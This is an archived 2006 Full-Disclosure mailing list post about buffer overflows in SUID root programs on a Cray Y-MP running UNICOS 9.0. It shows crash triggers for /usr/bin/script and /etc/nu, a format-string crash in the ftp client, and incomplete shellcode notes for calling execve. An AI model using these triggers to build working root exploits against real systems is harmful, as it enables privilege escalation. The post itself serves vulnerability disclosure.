Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] SUID root overflows in UNICOS and partial shellcode

From: Micheal Turner (wh1t3h4t3yahoo.co.uk)
Date: Tue Jan 10 2006 - 10:49:08 CST

Cray PVP Exploitation (Historical Hacking)
------------------[ Misc CPU information
This Cray Y-MP EL with 4 CPUs and 1 GB of RAM is
running UNICOS Release 9.0
[guestyel guest]$ uname -a
sn5176 sn5176 sin.0 CRAY Y-MP
[guestyel guest]$ df
/ (/dev/dsk/root ): 129232 .5K blocks
( 14.7%) 25880 I-nodes
/tmp (/dev/dsk/tmp ): 1966952 .5K blocks
( 98.3%) 62402 I-nodes
/usr (/dev/dsk/usr ): 7016 .5K blocks
( 0.5%) 22571 I-nodes
/usr/src (/dev/dsk/src ): 429312 .5K blocks
( 44.7%) 25958 I-nodes
/adddisk1 (/dev/dsk/opt ): 704760 .5K blocks
( 58.7%) 31671 I-nodes
/proc (/proc ): 2007520 .5K blocks
( 97.6%) 629 procs
/onserver (server:/disk1/exports/yel):
                                   54180728 .5K blocks
( 70.4%)
/home (server:/disk1/home):
                                   54180728 .5K blocks
( 70.4%)
/var/sysinfo (server:/var/sysinfo):
                                    7389440 .5K blocks
( 61.7%)
/secure (server:/secure ): 7389440 .5K blocks
( 61.7%)

==================[ Vulnerabilities
------------------[ /usr/bin/script suid root command
line args buffer overflow
-rwsr-xr-x 1 root bin 730000 Sep 5 1996
[guestyel guest]$ script `perl -e 'print "A"x1000'`
Operand range error (core dumped)

------------------[ /etc/nu suid root file parsing
buffer overflow
-rwsr-xr-x 1 root bin 1045400 Sep 4 1996

[guestyel guest]$ echo "" >> /tmp/acid
[guestyel guest]$ udbgen -p /tmp
udbgen: An acid file with at least one line is
        Acid format: 'account_name:account_id'
udbgen: /tmp/group: No such file or directory
udbgen: A group file with at least one line is
        Group format: 'group_name:*:group_id:'
[guestyel guest]$ echo `perl -e 'print "A"x10000'` >>
[guestyel guest]$ /etc/nu -p /tmp -c /tmp/script -a
admin/udb/nu/nu.c 90.7 09/03/96 10:43:53
nu: no GroupHome information in /tmp/script
Operand range error (core dumped)

-----------------[ /bin/ftp QUOTE format string vuln
(BSD ftp client bug) [non suid]
ftp> quote %08x.%08x.%08x.%08x.
command not understood.
ftp> quote %n%n%n%n%n
Operand range error (core dumped)

-----------------[ UNICOS Shellcoding CRAY PVP
The CRAY PVP does not natively support a 'syscall'
instruction(unlike the new Cray X1, where
the OS node provides a system call interface to the
other nodes.) instead, we will use the
systems standard libaries (which are linked in to
most, if not all applications). Particularly
we will focus on 'libu.a', which provides the UNICOS
Standard Library.

[guestyel guest]$ as -f myfile.s
[guestyel guest]$ segldr -e MAIN myfile.o -lu
 ldr-240 segldr: CAUTION
     Entry point 'MAIN' in module 'PROG1' from file
'myfile.o' was specified on
     an XFER directive but is not a primary entry.
[guestyel guest]$ ./a.out
[guestyel guest]$ cat myfile.s
        IDENT PROG1
        CALL execve ;; arguements required.

[guestyel guest]$

------------------[ Documentation sites

NEW Yahoo! Cars - sell your car and browse thousands of new and used cars online! http://uk.cars.yahoo.com/
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/